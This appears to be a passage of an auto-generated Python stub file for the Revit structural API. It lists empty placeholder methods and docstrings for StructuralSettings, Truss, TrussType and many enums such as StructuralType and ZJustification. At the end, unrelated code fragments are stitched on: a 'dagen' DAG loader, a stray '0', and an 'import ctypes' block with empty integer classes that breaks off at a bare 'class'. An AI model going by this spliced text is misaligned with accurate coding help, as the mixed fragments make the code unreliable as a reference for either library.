Contains the family base element to which the section shape type parameter belongs. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: StructuralSectionsServiceData, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, document, currentElementIds): """ __new__(cls: type, document: Document, currentElementIds: IList[ElementId]) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass Document = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The current document. Get: Document(self: StructuralSectionsServiceData) -> Document """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: StructuralSectionsServiceData) -> bool """ class StructuralSettings(Element, IDisposable): """ Provides access to project-wide structural settings. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass @staticmethod def GetStructuralSettings(doc): """ GetStructuralSettings(doc: Document) -> StructuralSettings Obtains the StructuralSettings object for the specified project document. doc: A project document. Returns: The StructuralSettings object. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass AnalyticalLinkAutofixTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Tolerance for the analytical link distance. Get: AnalyticalLinkAutofixTolerance(self: StructuralSettings) -> float Set: AnalyticalLinkAutofixTolerance(self: StructuralSettings) = value """ AnalyticalModelAutoCheckConsistency = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check automatically for consistency between the analytical and physical models. 
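    Example (illustrative sketch, not part of the generated stub; assumes an open
    Document 'doc' and an active Transaction):

        settings = StructuralSettings.GetStructuralSettings(doc)
        settings.AnalyticalModelAutoCheckConsistency = True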
Get: AnalyticalModelAutoCheckConsistency(self: StructuralSettings) -> bool Set: AnalyticalModelAutoCheckConsistency(self: StructuralSettings) = value """ AnalyticalModelAutoCheckMemberSupports = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check automatically for member supports. Get: AnalyticalModelAutoCheckMemberSupports(self: StructuralSettings) -> bool Set: AnalyticalModelAutoCheckMemberSupports(self: StructuralSettings) = value """ AnalyticalModelCheckAdjustment = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check for analytical model distance from default location is larger than the tolerance defined by the property AnalyticalModelAdjustmentTolerance. Get: AnalyticalModelCheckAdjustment(self: StructuralSettings) -> bool Set: AnalyticalModelCheckAdjustment(self: StructuralSettings) = value """ AnalyticalModelCheckBeamSlabDistance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check the analytical model distance between beam and slab for a level. Get: AnalyticalModelCheckBeamSlabDistance(self: StructuralSettings) -> bool Set: AnalyticalModelCheckBeamSlabDistance(self: StructuralSettings) = value """ AnalyticalModelCheckCircularReferences = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check member supports for circular references. Get: AnalyticalModelCheckCircularReferences(self: StructuralSettings) -> bool Set: AnalyticalModelCheckCircularReferences(self: StructuralSettings) = value """ AnalyticalModelCheckDiscrepancy = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check for distance between analytical and physical models greater than a tolerance defined by AnalyticalModelDiscrepancyTolerance. Get: AnalyticalModelCheckDiscrepancy(self: StructuralSettings) -> bool Set: AnalyticalModelCheckDiscrepancy(self: StructuralSettings) = value """ AnalyticalModelCheckInstability = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check for possible instability based on release conditions. Get: AnalyticalModelCheckInstability(self: StructuralSettings) -> bool Set: AnalyticalModelCheckInstability(self: StructuralSettings) = value """ AnalyticalModelCheckSupportDistance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Check that joins in the physical model are consistent with proximity in the analytical model. Get: AnalyticalModelCheckSupportDistance(self: StructuralSettings) -> bool Set: AnalyticalModelCheckSupportDistance(self: StructuralSettings) = value """ AnalyticalModelDiscrepancyTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Tolerance for the analytical-to-physical model distance. Get: AnalyticalModelDiscrepancyTolerance(self: StructuralSettings) -> float Set: AnalyticalModelDiscrepancyTolerance(self: StructuralSettings) = value """ AnalyticalModelHorizontalAutofixTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Tolerance for horizontal auto-detect for the analytical model. 
Get: AnalyticalModelHorizontalAutofixTolerance(self: StructuralSettings) -> float Set: AnalyticalModelHorizontalAutofixTolerance(self: StructuralSettings) = value """ AnalyticalModelSupportDistanceTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The maximum distance between two structural elements, where analytical model support rules still apply. Get: AnalyticalModelSupportDistanceTolerance(self: StructuralSettings) -> float Set: AnalyticalModelSupportDistanceTolerance(self: StructuralSettings) = value """ AnalyticalModelVerticalAutofixTolerance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Tolerance for vertical auto-detect for the analytical model. Get: AnalyticalModelVerticalAutofixTolerance(self: StructuralSettings) -> float Set: AnalyticalModelVerticalAutofixTolerance(self: StructuralSettings) = value """ BoundaryConditionAreaAndLineSymbolSpacing = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Symbol spacing for boundary conditions. Get: BoundaryConditionAreaAndLineSymbolSpacing(self: StructuralSettings) -> float Set: BoundaryConditionAreaAndLineSymbolSpacing(self: StructuralSettings) = value """ BoundaryConditionFamilySymbolFixed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FamilySymbol to represent a fixed boundary condition. Get: BoundaryConditionFamilySymbolFixed(self: StructuralSettings) -> ElementId Set: BoundaryConditionFamilySymbolFixed(self: StructuralSettings) = value """ BoundaryConditionFamilySymbolPinned = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FamilySymbol to represent a pinned boundary condition. Get: BoundaryConditionFamilySymbolPinned(self: StructuralSettings) -> ElementId Set: BoundaryConditionFamilySymbolPinned(self: StructuralSettings) = value """ BoundaryConditionFamilySymbolRoller = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FamilySymbol to represent a roller boundary condition. Get: BoundaryConditionFamilySymbolRoller(self: StructuralSettings) -> ElementId Set: BoundaryConditionFamilySymbolRoller(self: StructuralSettings) = value """ BoundaryConditionFamilySymbolUserDefined = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the FamilySymbol to represent a user-defined boundary condition. Get: BoundaryConditionFamilySymbolUserDefined(self: StructuralSettings) -> ElementId Set: BoundaryConditionFamilySymbolUserDefined(self: StructuralSettings) = value """ BraceAboveSymbol = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the ElementType to represent a brace above a beam in plan view. Get: BraceAboveSymbol(self: StructuralSettings) -> ElementId Set: BraceAboveSymbol(self: StructuralSettings) = value """ BraceBelowSymbol = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the ElementType to represent a brace below a beam in plan view. Get: BraceBelowSymbol(self: StructuralSettings) -> ElementId Set: BraceBelowSymbol(self: StructuralSettings) = value """ BraceParallelLineOffset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The distance by which brace symbols in plan views will be offset. 
Get: BraceParallelLineOffset(self: StructuralSettings) -> float Set: BraceParallelLineOffset(self: StructuralSettings) = value """ CheckAnalyticalModelAsset = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to check for valid Asset within the Material of associated Physical Element. Get: CheckAnalyticalModelAsset(self: StructuralSettings) -> bool Set: CheckAnalyticalModelAsset(self: StructuralSettings) = value """ DifferentiateAnalyticalEnds = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to use a subcategory for the ends of a linear analytical model, rather than the main category. Get: DifferentiateAnalyticalEnds(self: StructuralSettings) -> bool Set: DifferentiateAnalyticalEnds(self: StructuralSettings) = value """ KickerBraceSymbol = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The id of the ElementType to represent a kicker brace. Get: KickerBraceSymbol(self: StructuralSettings) -> ElementId Set: KickerBraceSymbol(self: StructuralSettings) = value """ ShowBraceAbove = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to show brace symbols above beams in plan views. Get: ShowBraceAbove(self: StructuralSettings) -> bool Set: ShowBraceAbove(self: StructuralSettings) = value """ ShowBraceBelow = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether to show brace symbols below beams in plan views. Get: ShowBraceBelow(self: StructuralSettings) -> bool Set: ShowBraceBelow(self: StructuralSettings) = value """ SymbolicCutbackForBeamAndTruss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Symbolic cutback distance to be applied to all beams and trusses. Get: SymbolicCutbackForBeamAndTruss(self: StructuralSettings) -> float Set: SymbolicCutbackForBeamAndTruss(self: StructuralSettings) = value """ SymbolicCutbackForBrace = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Symbolic cutback distance to be applied to all braces. Get: SymbolicCutbackForBrace(self: StructuralSettings) -> float Set: SymbolicCutbackForBrace(self: StructuralSettings) = value """ SymbolicCutbackForColumn = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Symbolic cutback distance to be applied to all columns. Get: SymbolicCutbackForColumn(self: StructuralSettings) -> float Set: SymbolicCutbackForColumn(self: StructuralSettings) = value """ class StructuralType(Enum, IComparable, IFormattable, IConvertible): """ Represents the structural type of a family instance. enum StructuralType, values: Beam (1), Brace (2), Column (3), Footing (4), NonStructural (0), UnknownFraming (5) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Beam = None Brace = None Column = None Footing = None NonStructural = None UnknownFraming = None value__ = None class StructuralWallUsage(Enum, IComparable, IFormattable, IConvertible): """ Represents the structural usage of a wall. enum StructuralWallUsage, values: Bearing (1), Combined (3), NonBearing (0), Shear (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bearing = None Combined = None NonBearing = None Shear = None value__ = None class StructuralWallUsageFilter(ElementSlowFilter, IDisposable): """ A filter used to match walls that have the given structural wall usage. StructuralWallUsageFilter(structuralWallUsage: StructuralWallUsage, inverted: bool) StructuralWallUsageFilter(structuralWallUsage: StructuralWallUsage) """ def Dispose(self): """ Dispose(self: ElementFilter, A_0: bool) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ElementFilter, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, structuralWallUsage, inverted=None): """ __new__(cls: type, structuralWallUsage: StructuralWallUsage, inverted: bool) __new__(cls: type, structuralWallUsage: StructuralWallUsage) """ pass StructuralWallUsage = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The wall structural usage. Get: StructuralWallUsage(self: StructuralWallUsageFilter) -> StructuralWallUsage """ class SurfaceElementExtension(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Extension. 
enum SurfaceElementExtension, values: BottomOrTop (0), Plane (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrTop = None Plane = None value__ = None class SurfaceElementProjectionZ(Enum, IComparable, IFormattable, IConvertible): """ Presets for given Analytical Projection Z. enum SurfaceElementProjectionZ, values: BottomOrExterior (2), CenterOfCore (3), CenterOfElement (1), Plane (4), TopOrInterior (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrExterior = None CenterOfCore = None CenterOfElement = None Plane = None TopOrInterior = None value__ = None class TargetRebarConstraintType(Enum, IComparable, IFormattable, IConvertible): """ A type used to identify the particular part of a Stirrup style rebar to which a Standard style rebar's handle is constrained. enum TargetRebarConstraintType, values: BarBend (5), Edge (3), EndOfBar (2), HookBend (6), OutOfPlaneExtent (4), RebarPlane (0), StartOfBar (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BarBend = None Edge = None EndOfBar = None HookBend = None OutOfPlaneExtent = None RebarPlane = None StartOfBar = None value__ = None class TranslationRotationValue(Enum, IComparable, IFormattable, IConvertible): """ Specifies the type of condition applied to the translation or rotation parameter. enum TranslationRotationValue, values: Fixed (0), Release (1), Spring (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Fixed = None Release = None Spring = None value__ = None class Truss(Element, IDisposable): """ Represents all kinds of Trusses. """ def AttachChord(self, attachToElement, location, forceRemoveSketch): """ AttachChord(self: Truss, attachToElement: Element, location: TrussChordLocation, forceRemoveSketch: bool) Attach a truss's specific chord to a specified element, the element should be a roof or floor. attachToElement: The element to which the truss's chord will attach. The element should be a roof or floor. location: The chord need to be attached. forceRemoveSketch: Whether to detach the original sketch if there is one. """ pass @staticmethod def Create(document, trussTypeId, sketchPlaneId, curve): """ Create(document: Document, trussTypeId: ElementId, sketchPlaneId: ElementId, curve: Curve) -> Truss Creates a new Truss. document: The document in which the new Truss is created. trussTypeId: Element id of the truss type. sketchPlaneId: Element id of a SketchPlane. curve: The curve of the truss element. It must be a line, must not be a vertical line, and must be within the sketch plane. """ pass def DetachChord(self, location): """ DetachChord(self: Truss, location: TrussChordLocation) Detach a truss's specific chord from the element to which it is attached. location: The chord. """ pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass @staticmethod def DropTruss(truss): """ DropTruss(truss: Truss) Drop truss Family, it will disassociate all members from the truss and delete the truss. truss: The truss to be dropped. """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetTrussMemberInfo(self, elemId): """ GetTrussMemberInfo(self: Truss, elemId: ElementId) -> TrussMemberInfo Query if a given element is a member of a truss, its lock status and its usage, etc. elemId: The querying element. 
Returns: A struct TrussMemberInfo that contains the querying element's host truss, whether to lock to the truss, usage type, etc. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def RemoveProfile(self): """ RemoveProfile(self: Truss) Remove the profile of a truss. """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetProfile(self, topChords, bottomChords): """ SetProfile(self: Truss, topChords: CurveArray, bottomChords: CurveArray) Add or modify the profile of a truss. topChords: The curves serving as top chords of the truss. bottomChords: The curves serving as bottom chords of the truss. """ pass def TogglePinMember(self, elemId): """ TogglePinMember(self: Truss, elemId: ElementId) Pin/Unpin a truss member. elemId: The member element is going to pin/unpin. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass Curves = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Get all the truss curves. Get: Curves(self: Truss) -> CurveArray """ Members = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Get all the members of truss. Get: Members(self: Truss) -> ICollection[ElementId] """ TrussType = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Retrieve/set an object that represents the type of the truss. Get: TrussType(self: Truss) -> TrussType Set: TrussType(self: Truss) = value """ class TrussChordLocation(Enum, IComparable, IFormattable, IConvertible): """ This enumerated type represents the options for the Truss Chord Location. enum TrussChordLocation, values: Bottom (0), Top (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bottom = None Top = None value__ = None class TrussCurveType(Enum, IComparable, IFormattable, IConvertible): """ Types of curves created in truss families. 
enum TrussCurveType, values: BottomChord (2), NonTrussCurve (0), TopChord (1), Web (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomChord = None NonTrussCurve = None TopChord = None value__ = None Web = None class TrussMemberInfo(object): """ Provides access to the information of a truss member in Autodesk Revit. TrussMemberInfo() """ hostTrussId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The host truss' ElementId of the member. Get: hostTrussId(self: TrussMemberInfo) -> ElementId Set: hostTrussId(self: TrussMemberInfo) = value """ lockedToTruss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether the member is locked to the host truss. Get: lockedToTruss(self: TrussMemberInfo) -> bool Set: lockedToTruss(self: TrussMemberInfo) = value """ memberTypeKey = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Kind of the member in the truss. Get: memberTypeKey(self: TrussMemberInfo) -> TrussMemberType Set: memberTypeKey(self: TrussMemberInfo) = value """ class TrussMemberType(Enum, IComparable, IFormattable, IConvertible): """ Indicates the "kind" of a truss member. enum TrussMemberType, values: ETK_TrussBottomChord (2), ETK_TrussDiagWeb (4), ETK_TrussTopChord (1), ETK_TrussVertWeb (3), ETK_Unknown (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass ETK_TrussBottomChord = None ETK_TrussDiagWeb = None ETK_TrussTopChord = None ETK_TrussVertWeb = None ETK_Unknown = None value__ = None class TrussType(FamilySymbol, IDisposable): """ Represents a specific type of truss. 
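    Truss elements reference a TrussType through the Truss.TrussType property,
    and new trusses are created from a truss type id via Truss.Create (see above).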
""" def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class WireDistributionDirection(Enum, IComparable, IFormattable, IConvertible): """ Defines the direction of the distribution of wires in a Fabric Sheet. enum WireDistributionDirection, values: Major (0), Minor (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Major = None Minor = None value__ = None class YJustification(Enum, IComparable, IFormattable, IConvertible): """ The justification of the framing element in Y. enum YJustification, values: Center (1), Left (0), Origin (2), Right (3) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Center = None Left = None Origin = None Right = None value__ = None class YZJustificationOption(Enum, IComparable, IFormattable, IConvertible): """ The option for whether a framing element has independent or uniform justification on its ends. 
enum YZJustificationOption, values: Independent (1), Uniform (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Independent = None Uniform = None value__ = None class ZJustification(Enum, IComparable, IFormattable, IConvertible): """ The justification of the framing element in Z. enum ZJustification, values: Bottom (3), Center (1), Origin (2), Top (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Bottom = None Center = None Origin = None Top = None value__ = None # variables with complex values # Dummy file to load dynamic dags from dagen from dagen.utils import get_managed_dags for dag in get_managed_dags(): globals()[dag.dag_id] = dag 0 import ctypes class Int8: pass class Int16: pass class Int32: pass class Int64: pass class 